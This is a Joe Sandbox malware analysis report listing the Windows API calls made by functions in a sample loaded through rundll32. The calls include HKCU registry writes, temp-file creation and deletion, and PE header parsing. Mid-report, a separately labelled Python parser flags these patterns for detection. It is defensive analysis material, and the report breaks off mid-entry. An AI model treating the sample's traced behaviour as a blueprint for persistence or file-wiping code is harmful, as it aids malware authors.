                                                          • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                                                          • String ID:
                                                          • API String ID: 316328430-0
                                                          • Opcode ID: 44bd1bc74b86dec1dc8f5280e9fe8c24402a4ca2e4d8cf25844edce1a742ba98
                                                          • Instruction ID: 20ce03dd7e38c7dc5900b539865957aac1c90e6764c07664616f01504614d4a5
                                                          • Opcode Fuzzy Hash: 44bd1bc74b86dec1dc8f5280e9fe8c24402a4ca2e4d8cf25844edce1a742ba98
                                                          • Instruction Fuzzy Hash: 6F218B3190020AFFDF109FA1EC4AE9E7FB9FB44354F11412AF505A2060EB359968EF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(05576398,00000000,00000000,0559C340,?,?,0558ED61,05576398,00000000,05576398,0559C320), ref: 0558C6B9
                                                          • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0558C6C7
                                                          • wsprintfA.USER32 ref: 0558C6E3
                                                          • RegCreateKeyA.ADVAPI32(80000001,0559C320,00000000), ref: 0558C6FB
                                                          • lstrlen.KERNEL32(?), ref: 0558C70A
                                                          • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 0558C718
                                                          • RegCloseKey.ADVAPI32(?), ref: 0558C723
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0558C732
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1575615994-0
                                                          • Opcode ID: 20edac26da1ebc1360af95edda6342cb26afb15ceed48393153d872083781dc6
                                                          • Instruction ID: 942686dedd1154f4434d4a02f069094c79f8972fd16985ba0f3c89b81baa77a1
                                                          • Opcode Fuzzy Hash: 20edac26da1ebc1360af95edda6342cb26afb15ceed48393153d872083781dc6
                                                          • Instruction Fuzzy Hash: 3C11AD36110108FFEB015B95EC8AEAA3F7EFB48724F024026FA05D6160DF769D58EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • OpenProcess.KERNEL32(00000040,00000000,?), ref: 0558C569
                                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0558C587
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0558C58F
                                                          • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 0558C5AD
                                                          • GetLastError.KERNEL32 ref: 0558C5C1
                                                          • RegCloseKey.ADVAPI32(?), ref: 0558C5CC
                                                          • CloseHandle.KERNEL32(00000000), ref: 0558C5D3
                                                          • GetLastError.KERNEL32 ref: 0558C5DB
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                                                          • String ID:
                                                          • API String ID: 3822162776-0
                                                          • Opcode ID: 77e16c26afb6b9f71491e08b8822e404b4a567a85a793e5f4e45b5ae69c5d0c7
                                                          • Instruction ID: 6b9c6656726792e32e3ea9b76155d722dba0b852c88e37f11a980e0fa8b76c31
                                                          • Opcode Fuzzy Hash: 77e16c26afb6b9f71491e08b8822e404b4a567a85a793e5f4e45b5ae69c5d0c7
                                                          • Instruction Fuzzy Hash: 35112A76104209EFEB119F60E849E7A3F6AFB48391F018022FA06D9240DF359D18AA70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: c2074d44e07bff4e795ece6d1c1021914bdcba9d5d57c5958508a7be023b474e
                                                          • Instruction ID: 9b13112e415be159d826b9c108a6b7b1ce0c88a2fba7fcfe02197568463e23cc
                                                          • Opcode Fuzzy Hash: c2074d44e07bff4e795ece6d1c1021914bdcba9d5d57c5958508a7be023b474e
                                                          • Instruction Fuzzy Hash: 46A10571D2020EEFDF229FA5EC48ABEBBBAFF49314F104465E411A2160D7319A95EF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 05579877
                                                          • StrTrimA.SHLWAPI(00000000,?), ref: 05579894
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 055798C7
                                                          • RtlImageNtHeader.NTDLL(00000000), ref: 055798F2
                                                          • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 055799B4
                                                            • Part of subcall function 05586403: lstrlen.KERNEL32(0559B072,059BB184,0559B072,00000000,05591D0C), ref: 0558640C
                                                            • Part of subcall function 05586403: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 0558642F
                                                            • Part of subcall function 05586403: memset.NTDLL ref: 0558643E
                                                          • lstrlen.KERNEL32(00000000,00000000,0000014C,00000000,00000000), ref: 05579965
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,0000014C,00000000,00000000), ref: 05579994
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                                                          • String ID:
                                                          • API String ID: 239510280-0
                                                          • Opcode ID: 76fcc9db1833d418c0ef697b6c3c6b3457affc8ff022b7c1eca80791009ee900
                                                          • Instruction ID: 5a77410603752cdd026e8c44c8ec895edadb500371a6cae65e6a3dcb5925504a
                                                          • Opcode Fuzzy Hash: 76fcc9db1833d418c0ef697b6c3c6b3457affc8ff022b7c1eca80791009ee900
                                                          • Instruction Fuzzy Hash: 5E41E23161420AFFEB129B64EC4AFAE7FB9FB84750F150026F505A6180DF798A44EB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,?,?), ref: 05574141
                                                          • lstrlen.KERNEL32(?,?,?), ref: 0557415F
                                                          • RtlAllocateHeap.NTDLL(00000000,75146985,?), ref: 05574188
                                                          • memcpy.NTDLL(00000000,00000000,00000000), ref: 0557419F
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 055741B2
                                                          • memcpy.NTDLL(00000000,?,?), ref: 055741C1
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 05574225
                                                            • Part of subcall function 05580043: RtlLeaveCriticalSection.NTDLL(0559C140), ref: 055800C0
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                                                          • String ID:
                                                          • API String ID: 1635816815-0
                                                          • Opcode ID: 5ac675c309f7ae6a01a1ff7f3a8fcf71cb0a3b8394ee9ad5a8aee62f72632e04
                                                          • Instruction ID: c83d006553fcc02cab67f2aa0bb19f91519b5fcff47280876891480bce02a48a
                                                          • Opcode Fuzzy Hash: 5ac675c309f7ae6a01a1ff7f3a8fcf71cb0a3b8394ee9ad5a8aee62f72632e04
                                                          • Instruction Fuzzy Hash: 0E418C31A0021DEFDF22AFA5EC89AAE7FA5FF04350F014465F806A6260D7759A54DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlImageNtHeader.NTDLL ref: 055732D1
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05573314
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0557332F
                                                          • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 05573385
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 055733E0
                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 055733EE
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 055733F9
                                                            • Part of subcall function 0557E8A2: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0557E8B6
                                                            • Part of subcall function 0557E8A2: memcpy.NTDLL(00000000,?,00000000,00000000,00000000,?,055761AF,00000000,00000000,00000001,?,0557D44F,00000020,00000000,?,00000000), ref: 0557E8DF
                                                            • Part of subcall function 0557E8A2: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000), ref: 0557E908
                                                            • Part of subcall function 0557E8A2: RegCloseKey.ADVAPI32(00000000,?,055761AF,00000000,00000000,00000001,?,0557D44F,00000020,00000000,?,00000000,?,00000000,00000000), ref: 0557E933
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                                                          • String ID:
                                                          • API String ID: 3181710096-0
                                                          • Opcode ID: ae0a7c06122cb44a9e0995f02e33d89e40e6c9a3eb99d38193a36436d0f817a6
                                                          • Instruction ID: 9fb8f8c36c532e9077b9b593d17d7c109b9a94a41f4e8789c96b5b8bba7c465a
                                                          • Opcode Fuzzy Hash: ae0a7c06122cb44a9e0995f02e33d89e40e6c9a3eb99d38193a36436d0f817a6
                                                          • Instruction Fuzzy Hash: 1F41A372614209EFDB219F69EC8AF6A3BA9FB40361F060825F902D6150DF35D949FB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(0559C00C), ref: 05583EB5
                                                          • lstrcpy.KERNEL32(00000000), ref: 05583EF1
                                                            • Part of subcall function 0558F274: lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,0558974F,00000000,00000000,00000000,05593D7C,00000000,00000000,00000006), ref: 0558F283
                                                            • Part of subcall function 0558F274: mbstowcs.NTDLL ref: 0558F29F
                                                          • GetLastError.KERNEL32(00000000), ref: 05583F80
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05583F97
                                                          • InterlockedDecrement.KERNEL32(0559C00C), ref: 05583FAE
                                                          • DeleteFileA.KERNEL32(00000000), ref: 05583FCF
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05583FDF
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,75145520,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 055919EE
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A07
                                                            • Part of subcall function 055919DC: GetCurrentThreadId.KERNEL32 ref: 05591A14
                                                            • Part of subcall function 055919DC: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A20
                                                            • Part of subcall function 055919DC: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A2E
                                                            • Part of subcall function 055919DC: lstrcpy.KERNEL32(00000000), ref: 05591A50
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                                                          • String ID:
                                                          • API String ID: 908044853-0
                                                          • Opcode ID: dece8f0c3aed061c788cd055be7266738e4e499b1c6321b35e8c088ee1fe3dd0
                                                          • Instruction ID: 0740d0eb13414ea46ba8451a6da6baba620c32ca1079df7051776d4185eea63d
                                                          • Opcode Fuzzy Hash: dece8f0c3aed061c788cd055be7266738e4e499b1c6321b35e8c088ee1fe3dd0
                                                          • Instruction Fuzzy Hash: 1031C232A04115FBCB21AFA4DC89ABD7BB5FB44B51F124426F905A6140DA7C9A48EBD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,75145520,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 055919EE
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A07
                                                            • Part of subcall function 055919DC: GetCurrentThreadId.KERNEL32 ref: 05591A14
                                                            • Part of subcall function 055919DC: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A20
                                                            • Part of subcall function 055919DC: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A2E
                                                            • Part of subcall function 055919DC: lstrcpy.KERNEL32(00000000), ref: 05591A50
                                                          • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 055782C8
                                                          • StrTrimA.SHLWAPI(?,?), ref: 055782E6
                                                          • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 0557834F
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 05578370
                                                          • DeleteFileA.KERNEL32(?,00003219), ref: 05578392
                                                          • HeapFree.KERNEL32(00000000,?), ref: 055783A1
                                                          • HeapFree.KERNEL32(00000000,?,00003219), ref: 055783B9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 1078934163-0
                                                          • Opcode ID: e6552cc1e0cb17b243898c1f3d386ba77018b3ac8e74a8b6bd6c94060e33696d
                                                          • Instruction ID: 1d9d6486908df21a7ef9b0bc2aee86c27bb8363084c99c91ee014342bcb6524c
                                                          • Opcode Fuzzy Hash: e6552cc1e0cb17b243898c1f3d386ba77018b3ac8e74a8b6bd6c94060e33696d
                                                          • Instruction Fuzzy Hash: 6C31E73220820AAFE710EB99EC49F6A7BECFF44754F050416F644D7180DB68E909DBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,0558C8F5,00000000), ref: 05587FA3
                                                          • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 05587FB8
                                                          • memset.NTDLL ref: 05587FC5
                                                          • HeapFree.KERNEL32(00000000,00000000,?,0558C8F4,055764CD,?,00000000), ref: 05587FE2
                                                          • memcpy.NTDLL(?,055764CD,0558C8F4,?,0558C8F4,055764CD,?,00000000), ref: 05588003
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Allocate$Freememcpymemset
                                                          • String ID: chun
                                                          • API String ID: 2362494589-3058818181
                                                          • Opcode ID: 7bd266290300a6a542811ee996368273c2a0db5c58bd9611f73987113c62b8ea
                                                          • Instruction ID: cfd13452d3c0d1481e17006ff615a4bae5712b203d33a7416f0fed74a4f3cfff
                                                          • Opcode Fuzzy Hash: 7bd266290300a6a542811ee996368273c2a0db5c58bd9611f73987113c62b8ea
                                                          • Instruction Fuzzy Hash: 8E319C71604706EFD720EF56D845E26BBE8FF44320F06482AE95AE7660DB30F945DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,75145520,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 055919EE
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A07
                                                            • Part of subcall function 055919DC: GetCurrentThreadId.KERNEL32 ref: 05591A14
                                                            • Part of subcall function 055919DC: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A20
                                                            • Part of subcall function 055919DC: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A2E
                                                            • Part of subcall function 055919DC: lstrcpy.KERNEL32(00000000), ref: 05591A50
                                                          • lstrlen.KERNEL32(00000000,?,00000F00), ref: 05585932
                                                            • Part of subcall function 0557DD74: lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,05585956,?,00000000,000000FF,?,00000F00), ref: 0557DD85
                                                            • Part of subcall function 0557DD74: lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,05585956,?,00000000,000000FF,?,00000F00), ref: 0557DD8C
                                                            • Part of subcall function 0557DD74: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0557DD9E
                                                            • Part of subcall function 0557DD74: _snprintf.NTDLL ref: 0557DDC4
                                                            • Part of subcall function 0557DD74: _snprintf.NTDLL ref: 0557DDF8
                                                            • Part of subcall function 0557DD74: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 0557DE15
                                                          • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 055859CC
                                                          • HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 055859E9
                                                          • DeleteFileA.KERNEL32(00000000,00000000,?,?,?,00000000,000000FF,?,00000F00), ref: 055859F1
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF,?,00000F00), ref: 05585A00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                                                          • String ID: s:
                                                          • API String ID: 2960378068-2363032815
                                                          • Opcode ID: a30573efceaf376d346fe02704f91b4d224cf883a5260b6fb77ec5fa11c43bb5
                                                          • Instruction ID: 2326431261d63b7bafff136ef170b208f03fd1a922f48558ec4a49b56a2647e0
                                                          • Opcode Fuzzy Hash: a30573efceaf376d346fe02704f91b4d224cf883a5260b6fb77ec5fa11c43bb5
                                                          • Instruction Fuzzy Hash: C7314D72A0421ABFDB10ABA9DC89FAE7FBCBB48210F010555B515E3141FB78A6089B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
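The RegOpenKeyA/RegCreateKeyA/RegSetValueExA sequence listed earlier in this section (first argument 80000001 is HKEY_CURRENT_USER, and the RegSetValueExA type argument 00000003 is REG_BINARY) and the repeated GetTempPathA/GetTempFileNameA/DeleteFileA subcall chain are the host-activity patterns an analyst pulls out of these per-function API listings. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses bullet lines in the report's own format, splits them into function blocks at each "APIs" header, and flags the registry-write and temp-file drop-and-wipe patterns. The sample input is abridged from the two listings above; the rule names and the constant tables are my own.

```python
"""Parse Joe Sandbox 'APIs' bullet listings and flag host-activity patterns.
Added example; not part of the Joe Sandbox report or its IDA plugin output."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# One bullet line. The "Part of subcall function" prefix marks a call made by
# a callee of the listed function rather than by the function itself.
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Well-known constants as they appear (hex, zero-padded) in the report.
HKEY_NAMES = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM"}
REG_TYPES = {"00000001": "REG_SZ", "00000003": "REG_BINARY", "00000004": "REG_DWORD"}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    callee: str = ""   # non-empty when the line is a subcall


@dataclass
class Block:
    calls: List[Call] = field(default_factory=list)


def parse_calls(text: str) -> List[Block]:
    """Split report text into blocks at each 'APIs' header and parse bullets."""
    blocks: List[Block] = []
    cur = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = Block()
            blocks.append(cur)
            continue
        m = _CALL_RE.match(line)
        if not m or cur is None:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        cur.calls.append(Call(m["api"], m["module"], args, m["ref"], m["callee"] or ""))
    return blocks


def flag_block(block: Block) -> List[str]:
    """Return findings for one function block (direct calls and subcalls)."""
    names = {c.api for c in block.calls}
    findings: List[str] = []
    # Rule 1: a key under a known hive is opened/created and a value is set.
    for c in block.calls:
        if c.api in ("RegOpenKeyA", "RegCreateKeyA") and c.args:
            hive = HKEY_NAMES.get(c.args[0].upper())
            if hive and "RegSetValueExA" in names:
                typ = next((x.args[3] for x in block.calls
                            if x.api == "RegSetValueExA" and len(x.args) > 3), None)
                findings.append(f"registry write under {hive} (type {REG_TYPES.get(typ, typ)})")
                break
    # Rule 2: a temp file is named and a file is deleted in the same block.
    if "GetTempFileNameA" in names and names & {"DeleteFileA", "DeleteFileW"}:
        findings.append("temp file created then deleted (drop-and-wipe)")
    # Rule 3: the code walks a PE header in memory.
    if "RtlImageNtHeader" in names:
        findings.append("parses a PE header in memory")
    return findings


def summarize(text: str) -> Dict[int, List[str]]:
    """Map block index to its findings, omitting blocks with none."""
    out = {}
    for i, b in enumerate(parse_calls(text)):
        f = flag_block(b)
        if f:
            out[i] = f
    return out


# Constructed sample, abridged from two listings in the report above.
SAMPLE = """\
APIs
• RtlImageNtHeader.NTDLL ref: 055732D1
• RtlEnterCriticalSection.NTDLL(00000000), ref: 05573314
• RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0557332F
• RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 055733EE
• RtlLeaveCriticalSection.NTDLL(00000000), ref: 055733F9
  • Part of subcall function 0557E8A2: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0557E8B6
  • Part of subcall function 0557E8A2: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000), ref: 0557E908
  • Part of subcall function 0557E8A2: RegCloseKey.ADVAPI32(00000000,?,055761AF), ref: 0557E933
APIs
  • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433), ref: 05591A07
  • Part of subcall function 055919DC: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?), ref: 05591A2E
• StrChrA.SHLWAPI(?,0000002C,00003219), ref: 055782C8
• HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 05578370
• DeleteFileA.KERNEL32(?,00003219), ref: 05578392
"""

if __name__ == "__main__":
    for idx, findings in summarize(SAMPLE).items():
        print(f"block {idx}: " + "; ".join(findings))
```

Subcalls are deliberately folded into the enclosing block, because the report attributes them to the function that reaches them, and the registry write here only shows up through the 0557E8A2 subcall. The type decode is a hint only: a REG_BINARY value under HKCU is consistent with the encoded-payload-in-registry behaviour the report's signatures describe, but confirming that requires the dumped value, not just the call sequence.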

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 0558FDDB
                                                          • lstrcmpiW.KERNEL32(00000000,?,7519F710,?,?,?,0558D218), ref: 0558FE13
                                                          • lstrcmpiW.KERNEL32(?,?,?,?,?,0558D218), ref: 0558FE28
                                                          • lstrlenW.KERNEL32(?,?,?,?,0558D218), ref: 0558FE2F
                                                          • CloseHandle.KERNEL32(?,?,?,?,0558D218), ref: 0558FE57
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,0558D218), ref: 0558FE83
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0558FEA1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                                                          • String ID:
                                                          • API String ID: 1496873005-0
                                                          • Opcode ID: ae22562aa99bced2f10d9ecdde3295cd448e623d21a14064e83a6df1b6b0e63e
                                                          • Instruction ID: 12ea0c5b61a0d054b1489b5e13c408ab868e22752da9021c28183ca5d5bc7863
                                                          • Opcode Fuzzy Hash: ae22562aa99bced2f10d9ecdde3295cd448e623d21a14064e83a6df1b6b0e63e
                                                          • Instruction Fuzzy Hash: AF214F71610305AFDF10AFB1EC85E7B7BBDFF48644B051529B502E2111EB38E908EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(0558ED52,00000000,0559C320,0559C340,?,?,0558ED52,05576398,0559C320), ref: 05584256
                                                          • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0558426C
                                                          • lstrlen.KERNEL32(05576398,?,?,0558ED52,05576398,0559C320), ref: 05584274
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05584280
                                                          • lstrcpy.KERNEL32(0559C320,0558ED52), ref: 05584296
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,0558ED52,05576398,0559C320), ref: 055842EA
                                                          • HeapFree.KERNEL32(00000000,0559C320,?,?,0558ED52,05576398,0559C320), ref: 055842F9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFreelstrlen$lstrcpy
                                                          • String ID:
                                                          • API String ID: 1531811622-0
                                                          • Opcode ID: 5d3f1f3badc069d836ffc811fff99ef4759e0f1c387b9e2197e385223cba332c
                                                          • Instruction ID: d6c4e356078e987ba881f5b49950fdaa17f21a29a906bec1af11ea6efaaec037
                                                          • Opcode Fuzzy Hash: 5d3f1f3badc069d836ffc811fff99ef4759e0f1c387b9e2197e385223cba332c
                                                          • Instruction Fuzzy Hash: D421073110C286EFEF225FA5DC85F7A7F6AFB46354F06005AF84657250CB35A81ADB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(00000000,?,?,?), ref: 0557676E
                                                            • Part of subcall function 055829A6: lstrcpy.KERNEL32(-000000FC,00000000), ref: 055829E0
                                                            • Part of subcall function 055829A6: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,0557677B,?,?,?), ref: 055829F2
                                                            • Part of subcall function 055829A6: GetTickCount.KERNEL32 ref: 055829FD
                                                            • Part of subcall function 055829A6: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,0557677B,?,?,?), ref: 05582A09
                                                            • Part of subcall function 055829A6: lstrcpy.KERNEL32(00000000), ref: 05582A23
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • lstrcpy.KERNEL32(00000000), ref: 055767A9
                                                          • wsprintfA.USER32 ref: 055767BC
                                                          • GetTickCount.KERNEL32 ref: 055767D1
                                                          • wsprintfA.USER32 ref: 055767E6
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                                                          • String ID: "%S"
                                                          • API String ID: 1152860224-1359967185
                                                          • Opcode ID: 3ba9abf36c30b66cf869ca98e6649a427730945e217c09c3ff4dbcec09c19413
                                                          • Instruction ID: 687554dd4f0844de7b97c75d7298d54a78967f1839e1b66f58ea9dbf88c55a66
                                                          • Opcode Fuzzy Hash: 3ba9abf36c30b66cf869ca98e6649a427730945e217c09c3ff4dbcec09c19413
